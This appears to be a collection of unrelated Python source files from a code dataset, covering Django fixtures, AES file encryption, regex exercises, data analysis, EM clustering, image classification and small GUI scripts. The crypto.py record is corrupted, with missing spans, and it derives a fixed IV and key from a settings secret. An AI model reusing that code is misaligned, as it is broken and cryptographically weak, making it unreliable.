r['value']\n    )\n\n\n@unit_testing_only\ndef delete_all_fixture_data_types():\n    from corehq.apps.fixtures.models import FixtureDataType\n\n    results = FixtureDataType.get_db().view('fixtures/data_types_by_domain_tag', reduce=False).all()\n    for result in results:\n        try:\n            fixture_data_type = FixtureDataType.get(result['id'])\n        except Exception:\n            pass\n        else:\n            fixture_data_type.delete()\n","sub_path":"corehq/apps/fixtures/dbaccessors.py","file_name":"dbaccessors.py","file_ext":"py","file_size_in_byte":3635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
{"seq_id":"642049949","text":"from os import SEEK_END\nfrom hashlib import sha3_512\nimport struct\nfrom base64 import b16decode, b16encode\nfrom Crypto.Cipher import AES\nfrom Crypto.Random import get_random_bytes\nfrom django.core.files.base import File\nfrom django.conf import settings\n\n\ndef secret_key_aes():\n    k = settings.SECRET_KEY\n    if len(k) < 32:\n        k = k.ljust(32, ' ')\n    return AES.new(bytes(k, encoding='utf8')[:16],\n                   AES.MODE_CBC, bytes(k, encoding='utf8')[16:32])\n\n\nclass AESCrypto:\n    _header_size = struct.calcsize(' bytes:\n        return get_random_bytes(16)\n\n    @staticmethod\n    def gen_key(keylen):\n        return get_random_bytes(keylen)\n\n    @staticmethod\n    def key2str(key) -> str:\n        s = secret_key_aes().encrypt(key)\n        s = str(b16encode(s), encoding='utf-8')\n        return s\n\n    @staticmethod\n    def str2key(s) -> bytes:\n        s = s.upper()\n        key = b16decode(bytes(s, encoding='utf-8'))\n        key = secret_key_aes().decrypt(key)\n        return key\n
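\n    # Editorial note (added): key2str and str2key are inverses, because\n    # secret_key_aes() always derives the same key and IV from\n    # settings.SECRET_KEY. Hypothetical round trip:\n    #\n    #     k = AESCrypto.gen_key(32)\n    #     assert AESCrypto.str2key(AESCrypto.key2str(k)) == k\n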
\n    @staticmethod\n    def key_hash(k: bytes):\n        kh = sha3_512(k).hexdigest()\n        return kh\n\n    def aes(self, iv: bytes):\n        return AES.new(self.key, AES.MODE_CBC, iv)\n\n    def file_header_data(self, file_size, iv):\n        return struct.pack(' ori_data_size:\n                yield ori_data\n            else:\n                # remove padding spaces\n                yield ori_data[:remaining_file_size]\n            remaining_file_size -= ori_data_size\n        encrypted_file.close()\n\n    @property\n    def key_str(self):\n        return self.key2str(self.key)\n","sub_path":"utils/utils/crypto.py","file_name":"crypto.py","file_ext":"py","file_size_in_byte":4150,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
{"seq_id":"325137970","text":"import re\n\ns = '1qq123jkl833k3dkdk66pd0PHP'\n\n\n# define the replacement callback used with re.sub\ndef convert(value):\n    # # find the matched string and return it wrapped in underscores\n    # method = value.group()\n    # return \"__\" + method + \"__\"\n    method = value.group()\n    if int(method) > 6:\n        method = '0'\n    elif int(method) < 6:\n        method = '9'\n    else:\n        method = 'w3'\n\n    return method\n\n\n# r = re.sub('\\d', convert, s)\n# r = re.sub('PHP', convert, s)  # find the specified string and return it wrapped in underscores\n# r = re.findall('\\D', s, re.I)  # regex search\n# print(r)\n#\n# r1 = re.match('\\d', s)  # returns None; match() only matches from the first character, so a string not starting with a digit gives None\n# r2 = re.search('\\d', s)  # search() scans the whole string and returns as soon as it finds a match\n# print(r1.group())  # use the group method to extract the matched result\n# print(r2.group())\n\na = 'life is short i use python , i love python'\n\nr3 = re.search('life(.*)python', a)  # ordinary characters can act as delimiters: life marks the start, python the end; parentheses create a group\nprint(r3.group(1))  # group() fetches a captured group; the default is 0, and group(0) is special: it always returns the complete match, real groups start at 1\nprint(re.findall('life(.*)python', a))  # findall returns the matched results directly\nr4 = re.search('life(.*)python(.*)python', a)  # multiple groups\nprint(r4.group(0, 1, 2))  # return several groups\nprint(r4.groups())  # return all the matched groups\n","sub_path":"home-study/study-code/python-code/six/regex.py","file_name":"regex.py","file_ext":"py","file_size_in_byte":1498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
{"seq_id":"606161144","text":"import re\r\nfrom glob import glob\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfilenames = glob('baby_names/*.txt') \r\nssa_df_list = []\r\nfor file in filenames:\r\n    temp_df = pd.read_csv(file, names = ['names','sex','count'])\r\n    year = int(re.findall('\\d\\d\\d\\d', file)[0])\r\n    \r\n    if year > 2010:\r\n        break \r\n    temp_df['year'] = year\r\n    ssa_df_list.append(temp_df)\r\nfinaldf = pd.concat(ssa_df_list, axis = 0, ignore_index = True)\r\n\r\n#task 02: Display the top 5 male and female baby names of 2010.\r\n\r\ndf_2010 = finaldf[finaldf['year'] == 2010]\r\nfemale_names = df_2010[df_2010['sex'] == 'F']\r\nfemale_names_sort_by_count = female_names.sort_values('count', ascending = False, ignore_index = True)\r\n\r\n#top five female names of 2010\r\nprint (female_names_sort_by_count['names'][0:5]) \r\n\r\nmale_names = df_2010[df_2010['sex'] == 'M']\r\nmale_names_sort_by_count = male_names.sort_values('count', ascending = False, ignore_index = True)\r\n\r\n#top five male names of 2010\r\nprint (male_names_sort_by_count['names'][0:5]) \r\n\r\n#task 03: Calculate sum of the births column by sex as the total number of births \r\n#in that year(use pandas groupby method).\r\n\r\ngrouped_multiple = finaldf.groupby(['year', 'sex']).agg({'count': ['sum']})\r\nprint(grouped_multiple)\r\n\r\n#task 04: Plot the results of the above activity to show total births by sex and year.\r\n\r\ngrouped_multiple.plot(kind='bar')\r\ngrouped_multiple[0:10].plot(kind='bar')\r\n\r\n","sub_path":"Day24_code_challenge.py","file_name":"Day24_code_challenge.py","file_ext":"py","file_size_in_byte":1435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
{"seq_id":"561128582","text":"# coding=utf-8\nimport numpy as np\nfrom matplotlib import pyplot as plt\nfrom scipy.stats import multivariate_normal\n\ndef make_data():\n    mean_1 = [1,1]\n    mean_2 = [4,4]\n    mean_3 = [1,4]\n    cov1 = [[0.1,0],[0,0.1]]\n    cov2 = [[0.2,0],[0,0.2]]\n    cov3 = [[0.6,0],[0,0.6]]\n    arr1 = np.random.multivariate_normal(mean_1, cov1, 100)\n    arr2 = np.random.multivariate_normal(mean_2, cov2, 50)\n    arr3 = np.random.multivariate_normal(mean_3, cov3, 50)\n    figure, ax = plt.subplots()\n    ax.set_xlim(left=-4, right=8)\n    ax.set_ylim(bottom=-4, top=8)\n    for i in range(len(arr1)):\n        plt.plot(arr1[i][0], arr1[i][1], 'b--', marker='+', color='r')\n    for i in range(len(arr2)):\n        plt.plot(arr2[i][0], arr2[i][1], 'b--', marker='o', color='g')\n    for i in range(len(arr3)):\n        plt.plot(arr3[i][0], arr3[i][1], 'b--', marker='*', color='b')\n    plt.xlabel(\"x1\")\n    plt.ylabel(\"x2\")\n    plt.plot()\n    plt.title(\"sample\")\n    #plt.show()\n    return np.vstack((arr1, arr2, arr3))\n
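\n# Editorial note (added): the helpers below implement EM for a Gaussian\n# mixture. updateW is the E-step, setting w[i][j] proportional to\n# phi[i] * N(data[j]; mu[i], sigma[i]) and normalising over the components i;\n# updatePhi, updateMu and updateSigma together form the M-step.\n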
\ndef updatePhi(w):\n    n1 = len(w)\n    phi=np.zeros(n1)\n    for i in range(n1):\n        sum = 0\n        n2 = len(w[i])\n        for j in range(n2):\n            sum = sum + w[i][j]\n        phi[i] = sum/n2\n    return phi\n\ndef updateW(data,w,phi,mu,sigma):\n    n1=len(w) # 3\n    n2 = len(w[0]) # 200\n    var = []\n    for k in range(n1):\n        var.append(multivariate_normal(mean=mu[k].tolist(), cov=sigma[k].tolist()))\n\n    for j in range(n2):\n        sum = 0\n        for i in range(n1):\n            sum = sum + var[i].pdf(data[j])*phi[i]\n        for i in range(n1):\n            w[i][j] = var[i].pdf(data[j])*phi[i]/sum\n\ndef updateMu(data,w,mu):\n    changed=False\n    n1 = len(w) # 3\n    n2 = len(w[0]) # 200\n    for i in range(n1):\n        sumW = 0.0\n        sumX = np.array([0.0,0.0])\n        for j in range(n2):\n            sumW = sumW + w[i][j]\n            sumX = sumX + w[i][j]*data[j]\n        mu_new = sumX / sumW\n        if np.dot(mu_new-mu[i],mu_new-mu[i]) > 0.001:\n            changed = True\n        mu[i] = mu_new\n    return changed\n\ndef updateSigma(data,w,mu,sigma):\n    n1 = len(w) # 3\n    n2 = len(w[0]) # 200\n    sum=np.array([[0,0],[0,0]])\n    for i in range(n1):\n        sumW = 0.0\n        sumX = np.array([0.0,0.0])\n        for j in range(n2):\n            sumW = sumW + w[i][j]\n            z0 = np.array([data[j] - mu[i]])\n            z0T = np.array([data[j] - mu[i]]).transpose()\n            sumX = sumX + w[i][j]*np.dot(z0T, z0)\n        sigma[i] = sumX/sumW\n\ndef classify(data,mu,sigma):\n    n1 = len(mu) # 3 components\n    n2 = len(data) # 200 samples\n    var=[]\n    for k in range(n1):\n        var.append(multivariate_normal(mean=mu[k].tolist(), cov=sigma[k].tolist()))\n\n    figure, ax = plt.subplots()\n    ax.set_xlim(left=-4, right=8)\n    ax.set_ylim(bottom=-4, top=8)\n\n    for i in range(n2):\n        tmp_arr=np.array([])\n        for j in range(n1):\n            tmp_arr=np.append(tmp_arr,var[j].pdf(data[i]))\n        index = tmp_arr.argmax()\n        if index == 0:\n            plt.plot(data[i][0], data[i][1], 'b--', marker='+', color='r')\n        elif index == 1:\n            plt.plot(data[i][0], data[i][1], 'b--', marker='o', color='g')\n        elif index == 2:\n            plt.plot(data[i][0], data[i][1], 'b--', marker='o', color='b')\n    plt.xlabel(\"x1\")\n    plt.ylabel(\"x2\")\n    plt.title(\"result\")\n    plt.plot()\n    plt.show()\n\nif __name__ == \"__main__\":\n    # 1 make data\n    classN=3\n    data=make_data()\n    n=len(data)\n    w = np.array([np.zeros(n), np.zeros(n), np.zeros(n)])\n    # w = array[classN][n] = array[3][200]\n    for i in range(classN):\n        for j in range(n):\n            w[i][j]= 1.0/classN\n\n    phi=updatePhi(w)\n    mu = np.array([[6.0, 6.0], [4.0, -1.0], [-2.0, 2.0]])\n    sigma=np.array([[[0.1,0],[0,0.1]],[[0.1,0],[0,0.1]],[[0.1,0],[0,0.1]]])\n\n    # 2 training\n    while True:\n        updateW(data,w,phi,mu,sigma)\n        phi = updatePhi(w)\n        updateSigma(data,w,mu,sigma)\n        changed = updateMu(data,w,mu)\n        if not changed:\n            print(\"converged\")\n            break\n\n    # 3 show\n    print(\"mu=\",mu,\", sigma=\",sigma)\n    classify(data,mu,sigma)\n\n    print(\"hello\")\n\n#converged\n#mu= [[ 4.00729834  3.99848889]\n# [ 1.01089497  1.05225006]\n# [ 0.92949217  4.18380895]] ,\n#sigma= [[[ 0.23196114 -0.01896477]\n# [-0.01896477  0.17165715]]\n#\n# [[ 0.10205901  0.00157192]\n# [ 0.00157192  0.11477843]]\n#\n# [[ 0.7010517   0.04783335]\n# [ 0.04783335  0.51147277]]]","sub_path":"unsupervised_learning/src/MixturesGaussians.py","file_name":"MixturesGaussians.py","file_ext":"py","file_size_in_byte":4098,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
{"seq_id":"378798537","text":"\n
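# Editorial note (added): after m rounds of removing the current minimum,\n# func returns the pair [a, b] whose ratio a / b is the m-th smallest among\n# all ordered pairs drawn from n, e.g. func(['1', '2', '3'], '1') -> ['1', '3'].\n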
def func(n, m : str) -> list :\n    pairs = []\n    min_ratio = 2000000.0\n    rem = []\n    answer = []\n    for i in range(len(n)):\n        for j in range(i+1, len(n)) :\n            pairs.append([n[i], n[j]])\n    for x in range(int(m)):\n        for i in range(len(pairs)):\n            tmp = (int(pairs[i][0]) / int(pairs[i][1]))\n            if min_ratio > tmp:\n                min_ratio = tmp\n                rem = pairs[i]\n        answer = rem\n        pairs.remove(rem)\n        min_ratio = 2000000.0\n    return answer\nn = input().replace(\"[\",\"\").replace(\"]\",\"\").replace(\" \",\"\").split(\",\")\nm = input()\nresult = func(n,m)\nl = []\nfor i in range(len(result)):\n    l.append(int(result[i]))\nprint(l)","sub_path":"Code/CodeRecords/2634/61041/285848.py","file_name":"285848.py","file_ext":"py","file_size_in_byte":655,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
{"seq_id":"452082277","text":"import re\nimport csv \nfrom texttable import *\nimport asciitable\n\nclass ProgramData():\n    \"\"\"Container class for program data output\"\"\"\n    program = \"\"\n    #version = \"\"\n    #entries = []\n\n    def __init__(self):\n        self.data = dict()\n    \n    def as_rst(self, table, pad_char=\" \", width=4):\n        \"\"\"Convert asciitable to rst table\"\"\"\n        # draw() returns the rendered table as a string; indent every line\n        data = self.data[table].draw()\n        indented = \"\\n\".join(pad_char * width + line for line in data.splitlines())\n        return \".. table::\\n\\n\" + indented\n\n    def _sniff_table(self,filename):\n        \"\"\"Read all lines in a table. If header starts with a space, add a description\"\"\"\n        re_space = re.compile(\"^\\s+\\S+\")\n        fp = open(filename)\n        lines = fp.readlines()\n        fp.close()\n        for i, l in enumerate(lines):\n            if re_space.match(l):\n                lines[i] = \"rowname\" + lines[i]\n        return lines\n\n    def read_table(self, infile, comment_char=\"#\", delimiter=\"\\t\", header=True, na_char=\"NA\"):\n        table = Texttable()\n        first = True\n        with open(infile) as fp:\n            rows = csv.reader(fp, delimiter=delimiter)\n            for row in rows:\n                if first:\n                    ncol = len(row)\n                    cwidth = [0 for x in range(ncol)]\n                if header and first:\n                    table.header(row)\n                else:\n                    if len(row) < ncol:\n                        row = row + [na_char for x in range(0,ncol-len(row))]\n                    table.add_row(row)\n                first=False\n                for i in range(len(row)):\n                    if len(row[i]) > cwidth[i]:\n                        cwidth[i] = len(row[i]) + 1\n\n        table.set_cols_width(cwidth)\n        table.set_cols_align([\"l\"] + [\"r\" for x in range(1,ncol)])\n        fp.close()\n        return table\n","sub_path":"scilife/scilife/report/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1894,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
{"seq_id":"298898642","text":"# Uses python3\nimport sys\n\n'''\nGreedy fractional knapsack: pack the maximum total value into a limited capacity.\n'''\ndef get_optimal_value(capacity, weights, values):\n\n    res = order_as_most_valuable(weights, values)\n    total = 0\n    for i in res:\n        if i[1] <= capacity:\n            total += i[0]\n            capacity -= i[1]\n        else:\n            total += (i[0] / i[1]) * capacity\n            capacity = 0\n\n        if capacity == 0:\n            break\n    return total\n\n\ndef order_as_most_valuable(weights, values):\n    # sort (value, weight) pairs by value per unit of weight, best first;\n    # the previous dict keyed by the ratio silently dropped items with equal ratios\n    return sorted(zip(values, weights), key=lambda vw: vw[0] / vw[1], reverse=True)\n\n\nif __name__ == \"__main__\":\n    data = list(map(int, sys.stdin.read().split()))\n    n, capacity = data[0], data[1]\n    values = data[2:(2 * n + 2):2]\n    weights = data[3:(2 * n + 2):2]\n    opt_value = get_optimal_value(capacity, weights, values)\n    print(\"{:.10f}\".format(opt_value))\n","sub_path":"c1w3l6/fractional_knapsack.py","file_name":"fractional_knapsack.py","file_ext":"py","file_size_in_byte":1071,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
{"seq_id":"47308184","text":"import os\nimport h5py\nimport cv2\nimport numpy as np\nfrom 
keras.preprocessing.image import ImageDataGenerator\nfrom keras import optimizers\nfrom keras.models import Sequential\nfrom keras.layers import Convolution2D, MaxPooling2D, ZeroPadding2D\nfrom keras.layers import Activation, Dropout, Flatten, Dense\nfrom keras.optimizers import SGD\nfrom os.path import join, getsize\nimport sys\nfrom mcc_multiclass import multimcc, confusion_matrix\n\n\ndef load_im2(paths):\n l = []\n for name in paths:\n result = cv2.imread(name)\n im2 = cv2.resize(result, (224, 224)).astype(np.float32)\n im2[:,:,0] -= 103.939\n im2[:,:,1] -= 116.779\n im2[:,:,2] -= 123.68\n im2 = im2.transpose((2,0,1))\n #im2 = np.expand_dims(im2, axis=0)\n #print(im2.shape)\n l.append(im2)\n return l\n\n\n# path to the model weights files.\nweights_path = 'vgg16_first_training_raspberry_weights.h5'\n\n# dimensions of our images.\nimg_width, img_height = 224, 224\n\n\nvalidation_data_dir = 'datasets/so3/'\n\n\n# build the VGG16 network\nmodel = Sequential()\nmodel.add(ZeroPadding2D((1, 1), input_shape=(3, img_width, img_height)))\n\nmodel.add(Convolution2D(64, 3, 3, activation='relu', name='conv1_1'))\nmodel.add(ZeroPadding2D((1, 1)))\nmodel.add(Convolution2D(64, 3, 3, activation='relu', name='conv1_2'))\nmodel.add(MaxPooling2D((2, 2), strides=(2, 2)))\n\nmodel.add(ZeroPadding2D((1, 1)))\nmodel.add(Convolution2D(128, 3, 3, activation='relu', name='conv2_1'))\nmodel.add(ZeroPadding2D((1, 1)))\nmodel.add(Convolution2D(128, 3, 3, activation='relu', name='conv2_2'))\nmodel.add(MaxPooling2D((2, 2), strides=(2, 2)))\n\nmodel.add(ZeroPadding2D((1, 1)))\nmodel.add(Convolution2D(256, 3, 3, activation='relu', name='conv3_1'))\nmodel.add(ZeroPadding2D((1, 1)))\nmodel.add(Convolution2D(256, 3, 3, activation='relu', name='conv3_2'))\nmodel.add(ZeroPadding2D((1, 1)))\nmodel.add(Convolution2D(256, 3, 3, activation='relu', name='conv3_3'))\nmodel.add(MaxPooling2D((2, 2), strides=(2, 2)))\n\nmodel.add(ZeroPadding2D((1, 1)))\nmodel.add(Convolution2D(512, 3, 3, activation='relu', name='conv4_1'))\nmodel.add(ZeroPadding2D((1, 1)))\nmodel.add(Convolution2D(512, 3, 3, activation='relu', name='conv4_2'))\nmodel.add(ZeroPadding2D((1, 1)))\nmodel.add(Convolution2D(512, 3, 3, activation='relu', name='conv4_3'))\nmodel.add(MaxPooling2D((2, 2), strides=(2, 2)))\n\nmodel.add(ZeroPadding2D((1, 1)))\nmodel.add(Convolution2D(512, 3, 3, activation='relu', name='conv5_1'))\nmodel.add(ZeroPadding2D((1, 1)))\nmodel.add(Convolution2D(512, 3, 3, activation='relu', name='conv5_2'))\nmodel.add(ZeroPadding2D((1, 1)))\nmodel.add(Convolution2D(512, 3, 3, activation='relu', name='conv5_3'))\nmodel.add(MaxPooling2D((2, 2), strides=(2, 2)))\n\nmodel.add(Flatten(input_shape=model.output_shape[1:]))\nmodel.add(Dense(256, activation='relu'))\nmodel.add(Dropout(0.5))\nmodel.add(Dense(3, activation='sigmoid'))\n\n# load the weights of the VGG16 networks\n# (trained on ImageNet, won the ILSVRC competition in 2014)\n# note: when there is a complete match between your model definition\n# and your weight savefile, you can simply call model.load_weights(filename)\n\nassert os.path.exists(weights_path), 'Model weights not found (see \"weights_path\" variable in script).'\nmodel.load_weights(weights_path)\nprint('Model loaded.')\n\n# build a classifier model to put on top of the convolutional model\n\n# note that it is necessary to start with a fully-trained\n# classifier, including the top classifier,\n# in order to successfully do fine-tuning\n#top_model.load_weights(top_model_weights_path)\n\n\n# set the first 25 layers (up to the last conv 
block)\n# to non-trainable (weights will not be updated)\nfor layer in model.layers[:25]:\n    layer.trainable = False\n\n# compile the model with a SGD/momentum optimizer\n# and a very slow learning rate.\nmodel.compile(loss='binary_crossentropy',\n              optimizer=optimizers.SGD(lr=1e-4, momentum=0.9),\n              metrics=['accuracy'])\n\n\nvalidation_images = os.listdir(validation_data_dir)\nvalidation_images.sort()\n\nfor i in range(len(validation_images)):\n    validation_images[i] = validation_data_dir + validation_images[i]\n\n\nvalidation = np.array(load_im2(validation_images))\n\npredicted_labels = model.predict(validation)\npredicted_labels_linear = []\n\nprediction_summary = open(\"vgg16_first_train_raspberry_prediction_new.csv\", \"w\")\nprediction_summary.write(\";\".join(['FILENAME', 'PREDICTED_LABELS', 'E', 'G', 'L'])+'\\n')\n\n\nfor i in range(len(predicted_labels)):\n    cls_prob = predicted_labels[i]\n    predicted_labels_linear.append(np.argmax(cls_prob))\n    if predicted_labels_linear[i] == 0:\n        predicted_label = \"Early\"\n    elif predicted_labels_linear[i] == 1:\n        predicted_label = \"Good\"\n    elif predicted_labels_linear[i] == 2:\n        predicted_label = \"Late\"\n    line = [validation_images[i], predicted_label, str(round(cls_prob[0],3)), str(round(cls_prob[1],3)), str(round(cls_prob[2],3))]\n\n    prediction_summary.write(\";\".join(line)+\"\\n\")\n    prediction_summary.flush()\n\nprediction_summary.flush()\nprediction_summary.close()\n","sub_path":"vgg16_raspberry_predict_new.py","file_name":"vgg16_raspberry_predict_new.py","file_ext":"py","file_size_in_byte":5041,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
{"seq_id":"27790567","text":"# coding:utf-8\nfrom PyQt5.QtWidgets import QMainWindow, QPushButton , QWidget , QMessageBox, QApplication, QHBoxLayout\nimport sys\n\n\nclass WinForm(QWidget):\n    def __init__(self, parent=None):\n        super(WinForm, self).__init__(parent)\n        button1 = QPushButton('Button 1', self)\n        button2 = QPushButton('Button 2', self)\n\n        button1.clicked.connect(lambda: self.onButtonClick(1))  # the lambda expression calls this class method and passes the argument\n        button2.clicked.connect(lambda: self.onButtonClick(2))\n\n        layout = QHBoxLayout()\n        # layout.addStretch(1)\n        layout.addWidget(button1)\n        layout.addWidget(button2)\n\n        self.setLayout(layout)\n        self.setGeometry(300, 300, 300, 300)\n        self.show()\n\n    def onButtonClick(self, n):\n        print('Button {0} was pressed'.format(n))\n        QMessageBox.information(self, \"Message box\", 'Button {0} clicked'.format(n))\n
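\n\n# Editorial note (added): the two lambdas wired up in __init__ bake the\n# constants 1 and 2 in at definition time. If the connects were made in a loop\n# over a variable i, Python's late binding would make every button report the\n# last value of i; the usual fix is a default argument, e.g.\n# button.clicked.connect(lambda checked=False, i=i: self.onButtonClick(i)).\n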
UnitDetail\"\r\n\r\n\r\n df = pd.read_sql(query1, cnxn)\r\n df = df.drop_duplicates()\r\n \r\n df1 = pd.read_sql(query2, cnxn)\r\n df1 = df1.loc[df1['AuditYear']==2018]\r\n df1 = df1.drop_duplicates()\r\n\r\n df = pd.merge(df,df1,how = 'right', on='UnitCode')\r\n df = df.drop_duplicates(subset={'UnitCode','AuditYear','IntergovernmentalSourceCode'})\r\n df['CreateDatetime']=df['CreateDatetime'].astype('datetime64[ns]')\r\n df = df.loc[(df['UnitClassification'].isin(['A','B']))]\r\n df = df.loc[df['IntergovernmentalSourceCode'] == 'AFIR']\r\n df = df.sort_values('Name')\r\n df_out = df['Name'].str.upper()\r\n print('finished loading names')\r\n \r\n return df_out\r\n\r\n\r\ndef load_report() :\r\n \r\n cy = 2018\r\n fy = cy - 2\r\n years = range(fy,cy + 1)\r\n \r\n\r\n \r\n audit_sub_dt = np.array([])\r\n yrs = np.array([])\r\n names = np.array([])\r\n\r\n\r\n \r\n \r\n for y in years :\r\n \r\n aud = pd.read_excel('L:Unit Adm. Documents/'+str(y)+' Unit Audit Assignment Log.xlsx', \r\n sheet_name = 'Assignment Log', skiprows=1)\r\n aud = aud.loc[aud['Unit Type'].isin([50,51]),{'Unit Name', 'Date Report submitted in Portal '}]\r\n aud['Unit Name'] = aud['Unit Name'].str.upper()\r\n late = dt.date(y,12, 1)\r\n never = dt.date(y+1,6,30)\r\n \r\n munics = aud['Unit Name']\r\n for munic in munics : \r\n print(munic)\r\n aus = aud.loc[aud['Unit Name'] == munic, 'Date Report submitted in Portal '].values\r\n \r\n if isinstance(aus[0], datetime) :\r\n print('dt')\r\n aus = aus[0].date()\r\n elif isinstance(aus[0], np.datetime64) :\r\n print('np')\r\n ts = (aus[0] - np.datetime64('1970-01-01T00:00:00Z')) / np.timedelta64(1, 's')\r\n aus = datetime.utcfromtimestamp(ts).date()\r\n else :\r\n print(aus[0])\r\n aus = aus[0]\r\n #aus = dt.parse(str(aus[0]))\r\n if aus == datetime.utcfromtimestamp(0) or aus == '#N/A' or aus == '' or isinstance(aus, float) :\r\n audit_sub_dt = np.append(audit_sub_dt, [0])\r\n elif aus > late and aus < never : #submit date after 6/30/next year\r\n audit_sub_dt = np.append(audit_sub_dt, [0.5]) \r\n elif aus > never :\r\n audit_sub_dt = np.append(audit_sub_dt, [0]) \r\n else:\r\n audit_sub_dt = np.append(audit_sub_dt, [1])\r\n\r\n names = np.append(names, [munic])\r\n yrs = np.append(yrs, [y])\r\n \r\n\r\n print(y)\r\n \r\n subs = pd.DataFrame({'Municipality': names, 'AuditYear':yrs, 'Audit Submitted':audit_sub_dt,})\r\n subs = subs.pivot(index = 'Municipality', columns='AuditYear', values='Audit Submitted')\r\n \r\n\r\n\r\n return subs\r\n\r\n#df = load_data('SQLMSCP3','SLG_Reporting')\r\nout = load_report()\r\nout.to_csv('~/Documents/Projects/Municipal Systems/Data/Audit_Submit_History.csv')\r\n\r\n\r\n#ts = (aus[0] - np.datetime64('1970-01-01T00:00:00Z')) / np.timedelta64(1, 's')\r\n\r\n#datetime.utcfromtimestamp(ts)","sub_path":"Shill_Portfolio/Projects/Municipal Systems/Audit_Submit_3Years.py","file_name":"Audit_Submit_3Years.py","file_ext":"py","file_size_in_byte":3836,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"245459023","text":"current_users = ['GRABIELcruz', 'francisANDREA', 'luisdavid', 'pedro', 'luissebastian']\nnew_users = ['alfredo', 'grabielcruz', 'arguello', 'francisandrea', 'LUISDAVID']\n\ntest_current_users = []\ntest_new_users = []\n\nfor current_user in current_users:\n test_current_users.append(current_user.lower())\n\nfor new_user in new_users:\n test_new_users.append(new_user.lower())\n\nfor new_user in test_new_users:\n if new_user in test_current_users:\n print(new_user + ' is already been 
taken')\n else:\n print(new_user + ' is available. You can use it')\n\n","sub_path":"chap05/current_user.py","file_name":"current_user.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"137845639","text":"#!/usr/bin/python3\n\"\"\"\nThis scripts reads an API and stores the data\n\"\"\"\nimport requests\nimport sys\n\n\ndef main():\n \"\"\"\n Python script to read information from a public API\n returns employess an their completed tasks\n \"\"\"\n number = sys.argv[1]\n url_user = \"https://jsonplaceholder.typicode.com/users/{}\".format(number)\n url_tasks = (\"https://jsonplaceholder.typicode.com/users/{}/todos\".\n format(number))\n response = requests.get(url_tasks)\n tasks = response.json()\n user_info = requests.get(url_user).json()\n employee_name = user_info[\"name\"]\n list_of_done_tasks = [x for x in tasks if x['completed']]\n number_of_done_tasks = len(list_of_done_tasks)\n total_task_number = len(tasks)\n print(\"Employee {} is done with tasks({}/{}):\".format(employee_name,\n number_of_done_tasks,\n total_task_number))\n for task in list_of_done_tasks:\n print(\"\\t {}\".format(task[\"title\"]))\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"0x15-api/0-gather_data_from_an_API.py","file_name":"0-gather_data_from_an_API.py","file_ext":"py","file_size_in_byte":1092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"168692597","text":"import urllib.request\nimport shutil\n\ndef downloadfile(url,filename):\n with urllib.request.urlopen(url) as response, open(filename, 'wb') as out_file:\n shutil.copyfileobj(response, out_file)\n\nif __name__ == '__main__':\n url = \"http://cdn.knmi.nl/knmi/map/page/klimatologie/gegevens/maandgegevens/mndgeg_344_tg.txt\"\n filename = \"data/mndgeg_344_tg.txt\"\n downloadfile(url, filename)","sub_path":"energie/updatetemp.py","file_name":"updatetemp.py","file_ext":"py","file_size_in_byte":398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"242565532","text":"from classes import *\nfrom tkinter import *\nfrom tkinter import ttk\nimport time\n\n\n\n\njugador=crear_capitanes(1,5,\"Oro1\")\npreguerrero=jugador.equipo_guerreros[0]\nguerrero=preguerrero[0]\n\nenemigo=crear_capitanes(1,5,\"Plata1\")\npreguerrero1=enemigo.equipo_guerreros[0]\nguerrero1=preguerrero1[0]\n\n\n\ncomando_consola=0\n\n\n\n\n\n\t\n\n\ndef combate(suGuerrero,miGuerrero):\n\n\t\n\tglobal texto_pantalla\n\tglobal comando_consola\n\tglobal jugador\n\tglobal enemigo\n\n\tcomando_consola=0\n\n\troot=Tk()\n\tw=860\n\th=720\n\tws=root.winfo_screenwidth()\n\ths=root.winfo_screenheight()\n\tx=(ws/2)-(w/2)\n\ty=(hs/2)-(h/2)\n\t\n\troot.title(\"Fight&Run\")\n\troot.iconbitmap(\"espiral.ico\")\n\troot.geometry(\"%dx%d+%d+%d\" % (w,h,x,y))\n\n\ttexto_pantalla= StringVar()\n\n\tfoto_enemigo=PhotoImage(file=suGuerrero.foto)\n\tfoto_jugador=PhotoImage(file=miGuerrero.foto)\n\n\tframe_combate=Frame(root)\n\tframe_combate.config(bg=\"blue\")\n\tframe_combate.pack(fill=\"both\",expand=True)\n\n\t\t\n\n\n\n#---------------------------------Enemigo--------------------------------\n\n\tfotoguerreroenemigo=Label(frame_combate,image=foto_enemigo)\n\tfotoguerreroenemigo.grid(row=0, column=5,pady=5,padx=5,rowspan=4)\n\n\tframe_infoenemigo=Frame(frame_combate,width=300,height=300)\n\tframe_infoenemigo.config(bg=\"red\")\n\tframe_infoenemigo.grid(row=0, 
